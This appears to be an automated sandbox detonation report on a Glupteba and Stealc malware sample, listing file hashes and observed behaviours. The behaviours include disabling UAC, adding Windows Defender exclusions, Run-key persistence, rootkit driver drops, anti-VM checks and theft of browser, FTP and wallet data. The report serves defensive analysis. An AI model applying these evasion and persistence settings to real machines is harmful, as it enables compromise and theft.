SHA512 d2dee80aaa79b19f1eb1db85079a05f621780e06bfea9e838b62d757ba29399f9090ec7c6ff553377c9b712f3ba8dd812cdff39f3e28829928e86746a8ac6b27

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403290154511\assistant\dbghelp.dll

MD5 925ea07f594d3fce3f73ede370d92ef7
SHA1 f67ea921368c288a9d3728158c3f80213d89d7c2
SHA256 6d02ebd4ec9a6093f21cd8ccefb9445fa0ab7b1f69ac868a5cfc5d28ed8d2de9
SHA512 a809851da820d9fdd8fb860a8f549311dcc2579df2c6f6fba74f50d5d8bf94baa834b09fb5476ac248f18d1deb6b47d4fdd6d658889d5d45ca8774a9264483d2

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403290154511\assistant\dbgcore.DLL

MD5 8b6f64e5d3a608b434079e50a1277913
SHA1 03f431fabf1c99a48b449099455c1575893d9f32
SHA256 926d444ffca166e006920412677c4ed2ef159cf0efc0578cb45b824f428f5eb2
SHA512 c9aeac62ece564ac64a894300fb9d41d13f22951ead73421854c23c506760d984dff0af92bef2d80f3a66e782f0075832e9c24a50ae6110d27a25c14e065b41c

C:\Windows\System32\GroupPolicy\gpt.ini

MD5 8ef9853d1881c5fe4d681bfb31282a01
SHA1 a05609065520e4b4e553784c566430ad9736f19f
SHA256 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA512 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-29 01:53

Reported

2024-03-29 01:58

Platform

win7-20240221-en

Max time kernel

277s

Max time network

295s

Command Line

"C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies firewall policy service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" C:\Users\Admin\Pictures\GAGGKlG51O3Sq3EWazWTmdMP.exe N/A

Stealc

stealer stealc

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\eQab8B2PxEYcbVAqDugdgqm1.exe = "0" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\78fIaEFoqt4VmJx5qqnjLrq7.exe = "0" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Pictures\GAGGKlG51O3Sq3EWazWTmdMP.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Pictures\GAGGKlG51O3Sq3EWazWTmdMP.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Pictures\GAGGKlG51O3Sq3EWazWTmdMP.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vxaKF73QShJGL3WlJpXbztlK.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hXLv8yzBphPehaOItYTYhGJY.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KM4ARc7Cd5cMS8tmKdTKRX42.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gB3DsUuZuTHJ6RbsnVEfLkgd.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QHOl7FyGlpzD1CVHukoCpBkw.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nPbwk4GtX7EGAXb6ABp0NEA8.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XCf9iiZvj0oCmKcnv8LSBiSK.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7fPRBynyoixF2AZ5njsH0thF.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A
N/A N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
N/A N/A C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A
N/A N/A C:\Users\Admin\Pictures\Qfj5AJ57kGhZwhnmVOfbif5t.exe N/A
N/A N/A C:\Users\Admin\Pictures\Qfj5AJ57kGhZwhnmVOfbif5t.exe N/A
N/A N/A C:\Users\Admin\Pictures\Qfj5AJ57kGhZwhnmVOfbif5t.exe N/A
N/A N/A C:\Users\Admin\Pictures\Qfj5AJ57kGhZwhnmVOfbif5t.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\Pictures\Qfj5AJ57kGhZwhnmVOfbif5t.exe N/A
N/A N/A C:\Users\Admin\Pictures\Qfj5AJ57kGhZwhnmVOfbif5t.exe N/A
N/A N/A C:\Users\Admin\Pictures\Qfj5AJ57kGhZwhnmVOfbif5t.exe N/A
N/A N/A C:\Users\Admin\Pictures\Qfj5AJ57kGhZwhnmVOfbif5t.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u25w.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u25w.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\eQab8B2PxEYcbVAqDugdgqm1.exe = "0" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\78fIaEFoqt4VmJx5qqnjLrq7.exe = "0" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Pictures\GAGGKlG51O3Sq3EWazWTmdMP.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A

Manipulates WinMon driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMon C:\Windows\rss\csrss.exe N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Pictures\GAGGKlG51O3Sq3EWazWTmdMP.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\Pictures\GAGGKlG51O3Sq3EWazWTmdMP.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Pictures\GAGGKlG51O3Sq3EWazWTmdMP.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Pictures\GAGGKlG51O3Sq3EWazWTmdMP.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\GAGGKlG51O3Sq3EWazWTmdMP.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Logs\CBS\CbsPersist_20240329015412.cab C:\Windows\system32\makecab.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u25w.1.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u25w.1.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u25w.1.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\u25w.0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\u25w.0.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" C:\Users\Admin\Pictures\78fIaEFoqt4VmJx5qqnjLrq7.exe N/A
